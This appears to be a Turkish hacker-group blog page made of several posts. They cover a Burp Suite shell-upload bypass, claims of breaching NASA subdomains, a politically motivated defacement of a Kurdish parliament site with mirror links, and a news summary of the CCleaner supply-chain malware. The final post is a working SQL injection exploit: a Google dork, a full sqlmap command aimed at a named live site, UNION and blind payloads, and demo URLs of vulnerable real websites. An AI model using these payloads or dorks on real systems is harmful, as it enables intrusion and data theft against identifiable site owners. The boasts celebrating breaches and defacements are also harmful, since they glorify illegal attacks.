-->

Kali Linux Burpsuite Shell Upload Bypass

Selamun Aleyküm ..

Kali Linux 2017.1 Burpsuite (Professional) Shell Upload Bypass





Fan Sesi İçin Kusura Bakmayın :)

Nasa Veri Tabani Dumped

Selamun Aleyküm..
Aslinda bu konuyu public etmeyecektik çünki yönetim öyle uygun görmüştü ancak bazı haberler gördüm İD değerinin önüne hacked yazıp haber olmuşlar gülünç bir durum neyse :) biz SİPAHİLER olarak buraya yaklasık 10 -15 gün önce girdik. İnanin girdiğimiz veritabanlarini uğraştıgımız yerleri görseniz abartmıyorum ağzınız açık kalir, public etsek şahsi düşüncem dünya basınında yer alır. NASA'nın 5 Farkli Sub Domainine Girdik  Buyrun ;

https://pds.jpl.nasa.gov/




http://photojournal.jpl.nasa.gov/

https://ssd.jpl.nasa.gov/



https://sohodata.nascom.nasa.gov/





solarsystem.nasa.gov




Açık Teşekkür

Bügün Ummadıgım Anda Aldıgım Bir Hediye İle Mutlu Oldum Sizlerle Paylaşmak İstedim 
İyi Niyeti Ve Güzel Hediyesi İçin @Zer0Day Kardeşime Çok Çok Teşekkür Ederim Seviliyosun 





Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler


Türk hackerlar gayrimeşru referandumla Türkiye'nin de güneydoğusuna göz diken IKYB'nin meclis sitesini hackledi. Sitedeki yazışmaları ele geçirdi.

Hukuksuz referandumla Irak'ı parçalamaya götüren ve sözde bağımsızlık referandumundan Türkiye'nin güneydoğusuna da göz diken Irak Bölgesel Kürt Yönetimi'ne (IKBY), Türk hackerlar siber operasyon düzenledi. 

Turkz Hacker Grubu, IKBY Parlamentosu'na ait verileri ele geçirdiğini duyurdu ve bazı mailleri yayınladı. Söz konusu mailler arasında Türkiye'ye karşı görev almak isteyen provokatörlerin de mailleri görüldü.

Türkye düşmanlarına karşı siber operasyonlara devam edeceğini belirten Turkz Hacker Grubu, terör örgütü PKK'ya hizmet eden bir hacker grubunu da hackledi. 
Türk hackerlar siber operasyonu böyle duyurdu:

KAYNAK: 

İcratler :

site: http://www.kurdistan-parliament.org/
zone: http://zone-h.org/mirror/id/30298398
zone: http://defacers.org/view->437386

Not: Cloudflareden Dolayı Yönlendirme Görünmemektedir

site: http://www.kurdishack.com/

zone: http://mirror-h.org/browse/972571/
zone: http://www.aljyyosh.org/mirror.php?id=204823
zone: http://defacers.org/view->437385
zone: http://archive.is/iHLwz
zone: http://archive.is/iHLwz/image

Detaylar: 



Uyarı: CCleaner Hacklendi



Uyarı: CCleaner Kötü Amaçlı Yazılımları Dağıtmak İçin Hacklendi; Etkilenen Kullanici 2.3 Milyonun Üzerinde 

CCleaner uygulamasını bilgisayarınıza bu yılın 15 Ağustos ve 12 Eylül tarihleri ​​arasında resmi web sitesinden indirdiyseniz veya güncellediyseniz dikkatli olun; bilgisayarınız tehlikede. CCleaner, Piriform tarafından oluşturulan ve yakın zamanda Avast tarafından satın alınan ve kullanıcıların sistem performansını optimize etmek ve arttırmak için temizlemelerini sağlayan 2 milyondan fazla indirmeyi içeren popüler bir uygulamadır. Cisco Talos güvenlik araştırmacıları, Avast tarafından kullanıcıların uygulamayı indirmesine izin vermek için kullandıkları indirme sunucularının, yazılımın orijinal sürümünü kötü niyetli bir yazılım ile değiştiren ve yaklaşık bir ay boyunca milyonlarca kullanıcıya dağıtan bilinmeyen bazı bilgisayar korsanlarının tehlikeye girdiğini keşfetti .
Bu olay tedarik zinciri saldırısının bir başka örneğidir. Bu yılın başlarında, MeDoc adlı bir Ukraynalı şirketin güncelleme sunucuları, aynı şekilde , dünya çapında harap olan Petya ransomware'i dağıtmaktan da ödün verilmişti .

Aast ve Piriform doğruladı CCleaner v5.33.6162 ve CCleaner Cloud v1.07.3191 Windows 32-bit sürümü kötü amaçlı yazılım tarafından etkilendiğini söyledi.  KAYNAK:
 13 Eylül'de tespit edilen CCleaner'in kötü amaçlı sürümü, virüs bulaşmış bilgisayarlardan veri çalmak ve saldırganın uzaktan kumanda ve kontrol sunucularına gönderen çok aşamalı bir zararlı yazılım yükünü içeriyor.



Ayrıca, bilinmeyen bilgisayar korsanları, Symantec tarafından Piriform'a verilen geçerli bir dijital imza kullanarak kötü amaçlı kurulum yürütülebilir dosyasını (v5.33) imzaladı ve saldırganların sunucusu çökerse, DGA'nın Etki Alanı Oluşturma Algoritması'nı (DGA) kullanmasına izin verdi.


Piriform'daki Ürünlerin VP'si Paul Yung, "Alınan bilgilerin tamamı base64 tarafından özel bir alfabeyle şifrelendi ve kodlandı" diyor . "Kodlanmış bilgi, daha sonra harici bir IP adresine 216.126.xx gönderildi (bu adres, yükte sabit kodlandı ve biz burada son iki sekizli dosyayı kasıtlı olarak maskeledik) bir HTTPS POST isteği yoluyla."

Kötü amaçlı yazılım, aşağıdakileri içeren çok sayıda kullanıcı verisi toplamak üzere programlanmıştır:

Bilgisayar adı
Windows güncelleştirmeleri de dahil olmak üzere yüklü yazılımların listesi
Çalışan tüm işlemlerin listesi
IP ve MAC adresleri
İşlemin yönetici ayrıcalıklarıyla çalışıp çalışmadığı ve bunun 64 bitlik bir sistem olup olmadığı gibi ek bilgiler.


Bununla birlikte, Piriform, kullanıcılarının yüzde 3'üne kadar (2.27 milyona kadar) kötü niyetli yüklemeden etkilenebileceğini tahmin ediyordu. Etkilenen kullanıcıların, bilgisayarlarını tehlikeye düşürmekten korumak için, CCleaner yazılımlarını sürüm 5.34'e yükseltmesi önerilir.

En Yeni Sürümü Buradan İndirebilirsiniz : CCLEANER NEW

ArkansasWeb.com Sql İnjection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]